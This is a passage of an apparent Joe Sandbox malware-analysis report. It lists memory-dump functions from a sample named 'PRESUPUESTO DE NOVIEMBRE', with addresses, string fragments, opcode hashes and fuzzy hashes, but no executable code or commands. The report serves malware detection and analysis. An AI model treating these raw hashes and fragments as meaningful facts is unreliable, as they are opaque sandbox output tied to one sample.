(o_q, xrefs: 03006EDA

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: (o_q$Hcq
API String ID: 0-689770731
Opcode ID: 1346bd645640001b16a7e8007c17bf6308774d7ead416b7c5968efe277d0de4a
Instruction ID: 7fbb1ce0bb7f007d532d4c7e5268da40d755b6ddd0068fbbaf24a866d1f7a91f
Opcode Fuzzy Hash: 1346bd645640001b16a7e8007c17bf6308774d7ead416b7c5968efe277d0de4a
Instruction Fuzzy Hash: 36227C70A002199FEB54DF69C854AAEBBF6FF88300F148569E815EB3A1DF359D41CB90

Function 0300C148 Relevance: 2.7, Strings: 2, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 0300C400
PH_q, xrefs: 0300C3EF

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: a2e7fefcc418a3e6772f21fe8e39c0cb05aea6638ff98bd617f2e17e4e4c8f6f
Instruction ID: 4451f6e68ab833460a99dfee394969dd12107ec3c62a7e76be744ed2e35bb1d7
Opcode Fuzzy Hash: a2e7fefcc418a3e6772f21fe8e39c0cb05aea6638ff98bd617f2e17e4e4c8f6f
Instruction Fuzzy Hash: 76A1D674E01218DFEB54DFAAD884A9DBBF2FF89300F148169E419AB365DB309881CF50

Function 03005380 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 030055D9
PH_q, xrefs: 030055C8

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: f0ea144c10383ea80c3a8c2d4557e5406b50f9589ba9ff5668accfb5f778e8ec
Instruction ID: d88aa0723ff416b07664b67b9a8c6cf04fdf180a526ea5b3e904f7dfc7507dcb
Opcode Fuzzy Hash: f0ea144c10383ea80c3a8c2d4557e5406b50f9589ba9ff5668accfb5f778e8ec
Instruction Fuzzy Hash: 8D81B274E05218DFEB54DFAAD994A9DBBF2BF89300F14C069E419AB365DB309981CF10

Function 0300D288 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300D4E0
PH_q, xrefs: 0300D4CF

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 10584115c12b077c2fd4f41980fa1681898a3c135a75dadbed44e73135d1e5eb
Instruction ID: 7cf8754e0698a974cf7326e9dd7225a93ba9c2f7f6041b7de8ea34011ee5ac95
Opcode Fuzzy Hash: 10584115c12b077c2fd4f41980fa1681898a3c135a75dadbed44e73135d1e5eb
Instruction Fuzzy Hash: 5081A174E01218DFEB54DFAAD984A9DFBF2BF89300F148069E419AB365DB349985CF10

Function 0300C748 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 0300C98F
PH_q, xrefs: 0300C9A0

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 25298a2783a268f902b8691c344670edc038c9cbcade915f091d13e8459e222e
Instruction ID: 656c1b3e330c211d293ec70deeff575bbd0fdb00b8027142db46192328db9a98
Opcode Fuzzy Hash: 25298a2783a268f902b8691c344670edc038c9cbcade915f091d13e8459e222e
Instruction Fuzzy Hash: B981A174E01218DFEB54DFAAD984A9DBBF2BF89300F14C169E419AB365DB309981CF50

Function 0300C478 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 0300C6BF
PH_q, xrefs: 0300C6D0

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: de2a6211d94b8df03f4c7ade24d0d4b555542a92d7d70efa2ad2df226d25eb02
Instruction ID: 353283b5b2976dbc877c826db10070a4ec135ac75f0c6183774a4c1f99f6d041
Opcode Fuzzy Hash: de2a6211d94b8df03f4c7ade24d0d4b555542a92d7d70efa2ad2df226d25eb02
Instruction Fuzzy Hash: DB81B374E01218DFEB54DFAAD984A9DBBF2BF88300F14D169E419AB365DB305981CF50

Function 0300CA18 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 0300CC5F
PH_q, xrefs: 0300CC70

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 1691f865d6fd2864ac47f58442f8df2c67471816cb94c9f611e9ad99248129e0
Instruction ID: ca8150960e511479c5ca4e5f906acc56366c65cbafbac0602e2bd062690ccbb8
Opcode Fuzzy Hash: 1691f865d6fd2864ac47f58442f8df2c67471816cb94c9f611e9ad99248129e0
Instruction Fuzzy Hash: CC81C174E01218CFEB54DFAAD984A9DBBF2BF88300F14C169E419AB365DB305981CF50

Function 0300CFB8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300D210
PH_q, xrefs: 0300D1FF

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 733fb89b9b8bdd505406bf022d0011866012bc1e056e878b103e3597d952dff1
Instruction ID: f82f86a577c45d3d59f08129c66d85d70df33772509287f5892c2be52a6cd21f
Opcode Fuzzy Hash: 733fb89b9b8bdd505406bf022d0011866012bc1e056e878b103e3597d952dff1
Instruction Fuzzy Hash: DC81A274E01218DFEB54DFAAD984A9DBBF2BF88300F14C069E419AB365DB349981CF50

Function 0300CCE8 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 0300CF40
PH_q, xrefs: 0300CF2F

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 2f244c7a07642040099805d190f6af2a25f9c9cee6ac8a02f48ba7f862fba87b
Instruction ID: 4450ea340385f019df43de4d3285e9e7234fe5be3ee2488876ea34764a6e7659
Opcode Fuzzy Hash: 2f244c7a07642040099805d190f6af2a25f9c9cee6ac8a02f48ba7f862fba87b
Instruction Fuzzy Hash: F881B274E01258DFEB54DFAAD984A9DBBF2BF88300F14C169E419AB365DB305981CF50

Function 0300C468 Relevance: 2.7, Strings: 2, Instructions: 161COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300C6BF
PH_q, xrefs: 0300C6D0

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 89c7e9b6af36792b0d724969f9ce594c8689378decb5a28497623484a4733f43
Instruction ID: b00a21914a84a433e16f45db46c2f5935a7f0de3b3d916bd5118d3dbf5af91f5
Opcode Fuzzy Hash: 89c7e9b6af36792b0d724969f9ce594c8689378decb5a28497623484a4733f43
Instruction Fuzzy Hash: E961D374E016089FEB18DFAAC984A9DFBF2BF88300F14D16AD418AB365DB345945CF50

Function 03005362 Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

PH_q, xrefs: 030055D9
PH_q, xrefs: 030055C8

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 036d9dbdaaa0fe906d9275dd9153b6f6601b2804d2a8408ccdd523d80bd962f5
Instruction ID: 746da6112c6806507b43611285de2c4b4aa52134b20b3d081ba87550beff07f4
Opcode Fuzzy Hash: 036d9dbdaaa0fe906d9275dd9153b6f6601b2804d2a8408ccdd523d80bd962f5
Instruction Fuzzy Hash: 4B61C474E056089FEB58CFAAD994A9DFBF2BF89300F14C069D418AB365DB349945CF10

Function 0300CA08 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300CC5F
PH_q, xrefs: 0300CC70

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 3b4f772ff918ac98d3fb7278d26824d5f97b8ab527a6d92bc67f8184522230c9
Instruction ID: 7af6ffe225c46c4dee0efa459e872a7cd219b7ca7ccb503e7e48f410452f5e34
Opcode Fuzzy Hash: 3b4f772ff918ac98d3fb7278d26824d5f97b8ab527a6d92bc67f8184522230c9
Instruction Fuzzy Hash: 1F61C374E016089FEB58DFAAD984A9EFBF2BF89300F14C169E418AB365DB345845CF50

Function 0300D278 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300D4E0
PH_q, xrefs: 0300D4CF

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: e5f2d23209ef7050d8bd2d2910b2616d899b34f5ae7e46da02ed33fd2aacb137
Instruction ID: 8f4c8ecdc5bb0583f6acdc1d29c8c2b8000be6354aa10326918f72e0b048134e
Opcode Fuzzy Hash: e5f2d23209ef7050d8bd2d2910b2616d899b34f5ae7e46da02ed33fd2aacb137
Instruction Fuzzy Hash: 3261B274E016089FEB18DFAAD984A9DFBF2BF89300F14C469E418AB365DB345845CF50

Function 0300CFA9 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300D210
PH_q, xrefs: 0300D1FF

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 057337583957f021dc7954cd29649aabb37b7f73fc279192c1ad85f26febd848
Instruction ID: 6f329a356ea18a9a293f0b0aee5460cdedba0fb1fa3949d845227d91bcddb83f
Opcode Fuzzy Hash: 057337583957f021dc7954cd29649aabb37b7f73fc279192c1ad85f26febd848
Instruction Fuzzy Hash: 1461B474E016089FEB18DFAAD984A9DBBF2BF89300F14C069E418AB365DB749945CF50

Function 0300CCD8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

PH_q, xrefs: 0300CF40
PH_q, xrefs: 0300CF2F

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q
API String ID: 0-3760492949
Opcode ID: 3f0510a560d9c57a3e909724b3242a28f5a9b7f1202d09764fecff4aeefcf1a2
Instruction ID: 42e8ebb65379ac3b511f8a07a4d65e56f8be1924985c90757b2926f6ba1f1565
Opcode Fuzzy Hash: 3f0510a560d9c57a3e909724b3242a28f5a9b7f1202d09764fecff4aeefcf1a2
Instruction Fuzzy Hash: BC61C274E016489FEB18DFAAD984A9DFBF2BF88300F24C569E418AB365DB345845CF50

Function 05C19548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3756958468.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c10000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ecd65463c9c1c65f7d77f50c7dc6cbd5adaf69ec98eba48bdd7e644352d525
Instruction ID: cd593f1ab8639733f835ec1fe3914e663b2221b65ff76c74f7e5d7923c30791c
Opcode Fuzzy Hash: 22ecd65463c9c1c65f7d77f50c7dc6cbd5adaf69ec98eba48bdd7e644352d525
Instruction Fuzzy Hash: B1F1F174E01218CFDB14DFA9C894B9DBBB2BF89304F14C5A9E808AB355DB74A985CF50

Function 0300E97B Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff626e26804a35fa848dcd88771935d5493532ce2a5334b309f4f39eead67ff
Instruction ID: 51b2b7b5628cb8848c6bd4670045bc90c99598a254df9d98c08b415611f923ce
Opcode Fuzzy Hash: aff626e26804a35fa848dcd88771935d5493532ce2a5334b309f4f39eead67ff
Instruction Fuzzy Hash: 7151A574E01608DFDB18DFAAD994A9DBBB2FF89300F248429E815BB3A4DB345845CF14

Function 0300E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2008cab9a0a4142ae0df10def9a099bff1d6611036992d9328d8f7cc7d7b678
Instruction ID: a7d75ab583018f527cb5eeeb331bc3af1bdea31b09b430eae8635d50850a3c7f
Opcode Fuzzy Hash: c2008cab9a0a4142ae0df10def9a099bff1d6611036992d9328d8f7cc7d7b678
Instruction Fuzzy Hash: 7A51B674E01608DFEB18DFAAD954A9DBBB2FF89300F248429E815BB3A4DB345845CF14

Function 03007700 Relevance: 10.4, Strings: 8, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o_q, xrefs: 030078B2
(o_q, xrefs: 03007BFF
(o_q, xrefs: 0300772E
,cq, xrefs: 03007B90
,cq, xrefs: 03007BA0
(o_q, xrefs: 030077E9
(o_q, xrefs: 03007C0F
(o_q, xrefs: 03007815

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
API String ID: 0-3630396145
Opcode ID: 419e04f92721ad50a3f3350736156eff08508160fbbbfd43c89285ce7a03ebbc
Instruction ID: cac67b4186a0eb98fab80d1aaf673daaa6feb8f1c08af16313e7d0012de9bf8d
Opcode Fuzzy Hash: 419e04f92721ad50a3f3350736156eff08508160fbbbfd43c89285ce7a03ebbc
Instruction Fuzzy Hash: CB126930A016099FDB14CF68C984A9EBBF6FF89714F1485A9E4499B3A1D734FD41CB90

Function 030076F1 Relevance: 5.3, Strings: 4, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o_q, xrefs: 030078B2
(o_q, xrefs: 0300772E
(o_q, xrefs: 030077E9
(o_q, xrefs: 03007815

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: (o_q$(o_q$(o_q$(o_q
API String ID: 0-3600592161
Opcode ID: b2e0f274c540ad5e36e4aac9d4e87d809f77ce4f7c303746227aff27c7e32437
Instruction ID: ea03b734234affc677156c1da5b3c090c6dd6da5e75add13e201863f461aec39
Opcode Fuzzy Hash: b2e0f274c540ad5e36e4aac9d4e87d809f77ce4f7c303746227aff27c7e32437
Instruction Fuzzy Hash: BCC15C30A012099FDB14CF69C984AAEBBF6FF88704F148599E859AB3A1D734FD41CB50

Function 03009A20 Relevance: 2.8, Strings: 2, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'_q, xrefs: 03009D6D
4'_q, xrefs: 03009D84

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: 4'_q$4'_q
API String ID: 0-531570531
Opcode ID: 2af057d29f5f3e86e2116f0fda36144058b2a0f3077f0ddb19cd888274df1070
Instruction ID: ee18136b4fd6efdb5948b0efe67d8b2bbbb5b12c3917044f8a16cb65c7cdbd01
Opcode Fuzzy Hash: 2af057d29f5f3e86e2116f0fda36144058b2a0f3077f0ddb19cd888274df1070
Instruction Fuzzy Hash: 72C1F9316026059FE714CF69C880A6ABBFAFF85310F18C566E819DB3A6D731ED41C7A1

Function 03005F38 Relevance: 2.8, Strings: 2, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 03006023
Hcq, xrefs: 03006056

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: Hcq$Hcq
API String ID: 0-4088181183
Opcode ID: 37920109b71d4c645981ab86f819c323ffd8b67e7d4f1a6481c08c6abcf6407b
Instruction ID: 9b864e4858f6a73c2728d863fcdf5aeafd6e036348c04d8470d1bec84f0ab991
Opcode Fuzzy Hash: 37920109b71d4c645981ab86f819c323ffd8b67e7d4f1a6481c08c6abcf6407b
Instruction Fuzzy Hash: 4A91AD307042198FEB15DF28C894A6E7BF7EB89300F188869E4468B3E5DF768C41CB91

Function 03006498 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,cq, xrefs: 03006578
,cq, xrefs: 0300656E

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: ,cq$,cq
API String ID: 0-2927840315
Opcode ID: 3e930fe80e744acfb26ec0f297bc60889e454b336a0feb4d72679375b42c6bc3
Instruction ID: 3f9b3148a519dc8558144c2a0ffff60b82d838385527277b42505ca66fcb3e94
Opcode Fuzzy Hash: 3e930fe80e744acfb26ec0f297bc60889e454b336a0feb4d72679375b42c6bc3
Instruction Fuzzy Hash: 3D818134A0250ACFEB58CF69C48496EBBF7FF89210F188569D405DB3A4DB32E851CB51

Function 03003CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xcq, xrefs: 03003CCD
Xcq, xrefs: 03003CF6

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: Xcq$Xcq
API String ID: 0-1149048318
Opcode ID: af8bc5ddb546c302171315941d8c16c47014c2cba07910afe8d6b06355c424aa
Instruction ID: a66e72dccbc080679bee2428f88f4f34d3e3c78bb005b82940da1886d8ade303
Opcode Fuzzy Hash: af8bc5ddb546c302171315941d8c16c47014c2cba07910afe8d6b06355c424aa
Instruction Fuzzy Hash: B431E639B022298BFF5E856AA99427EA5EAFBC4240F1844BED827C73C0DF758C458651

Function 03008EF8 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

$_q, xrefs: 03008FD7
$_q, xrefs: 03008FB4

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: $_q$$_q
API String ID: 0-458585787
Opcode ID: a2af644b81e085e2b1876707ab1b46edfbec4d14b4f886222a19c301d3d254ae
Instruction ID: b66d50eeb653e5da78f6183cd7f12fc197b5ccfd9eeb6b60349718663d9e1fee
Opcode Fuzzy Hash: a2af644b81e085e2b1876707ab1b46edfbec4d14b4f886222a19c301d3d254ae
Instruction Fuzzy Hash: E43184303111158FEB29DB39C89463E7BABBF84710F1889A6F116CB2D2EE29DC81C755

Function 03000ED2 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

LR_q, xrefs: 03000F19

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: LR_q
API String ID: 0-2241839734
Opcode ID: 2ef366916da371760b86f57ddef20abbeddf16c14deb9cf7de4520d9c21ee3eb
Instruction ID: ae431c2009df8438afc094686e4e2aedbe6ce49702dcffd19f823ab851653a8a
Opcode Fuzzy Hash: 2ef366916da371760b86f57ddef20abbeddf16c14deb9cf7de4520d9c21ee3eb
Instruction Fuzzy Hash: 4732D77491021ADFCB64DF25EA85A8DBBB1FF48301F1091A5E809E7368DB396E95CF40

Function 05C1992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05C19A6E

Memory Dump Source

Source File: 00000005.00000002.3756958468.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c10000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09e89db17b7cba9952f74d0511873fdb2cff0ba51624d04a491f36ee72410503
Instruction ID: d2c73c4c1b03589078d74c82cd210bdd6064b56676998974c4efbcfb2823cd50
Opcode Fuzzy Hash: 09e89db17b7cba9952f74d0511873fdb2cff0ba51624d04a491f36ee72410503
Instruction Fuzzy Hash: 61117974E052098FDB08CFA9D8A4EADBBB6FF89304F148965E804A7241DB70A945DB64

Function 0300E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ccfe4539e81e72538a0bef3a29247071b5baf2efc39ca6da6667ac42f7ee1f
Instruction ID: f215b69055de0a18565eec9af40655a852546972e5eb822ce890989a2abfb63f
Opcode Fuzzy Hash: 58ccfe4539e81e72538a0bef3a29247071b5baf2efc39ca6da6667ac42f7ee1f
Instruction Fuzzy Hash: 33129A7547161A8FB7502B60EABE1AABF68FB0F313744BD11F10B801659F7618C9CB62

Function 0300E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6695dbcd1f9addbb9640fb6c5aebcc317418026249468391bd035fd214a7f8
Instruction ID: fc932f613bbb1e8397ad31294628dfb253a009ccd05fa2c173f5c720cae1a306
Opcode Fuzzy Hash: 6a6695dbcd1f9addbb9640fb6c5aebcc317418026249468391bd035fd214a7f8
Instruction Fuzzy Hash: C312997547161A8FB7502B60EABE1AABF68FB0F313744BD11F10B801659F7618C9CB62

Function 0300AEF4 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9abf09860d33ba7f5094e420aa12d174e3ba896a4ac4e6b7c5cbe1735d67ac7
Instruction ID: 7c538bc77fcada891f320e6aed340bcb444adc4d697a5860f38c10b22e9d5a23
Opcode Fuzzy Hash: c9abf09860d33ba7f5094e420aa12d174e3ba896a4ac4e6b7c5cbe1735d67ac7
Instruction Fuzzy Hash: 64123D75A012198FDB14CF6CC994AAEBBF6BF88310F198469E415EB3A1DB34ED41CB50

Function 030080D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a8798e5a6d20ea8382abe83a9b711dce5727595c85fb11a2afc98398c26f53
Instruction ID: a72f6890cb1bcd21ab40575d62bc6b3450e451738d9f334cddc1e6651fb64f20
Opcode Fuzzy Hash: 44a8798e5a6d20ea8382abe83a9b711dce5727595c85fb11a2afc98398c26f53
Instruction Fuzzy Hash: E0712C34701A058FEB55DF68C884AAE7BE9BF89340F1984A9E806DB3B1DB70DC41CB51

Function 0300F730 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8cfbe95c0140565835c8137643d7a79c7f1e9f851530711a4996ded3d1e70bb
Instruction ID: d8af9a51a662d905dc509ff27bded0a86413f30c2b669c8914361ec03e5d99c5
Opcode Fuzzy Hash: b8cfbe95c0140565835c8137643d7a79c7f1e9f851530711a4996ded3d1e70bb
Instruction Fuzzy Hash: 3F51F374D01319DFDB14DFA5D988AAEBBB2FF88300F208529E809AB398DB755945CF40

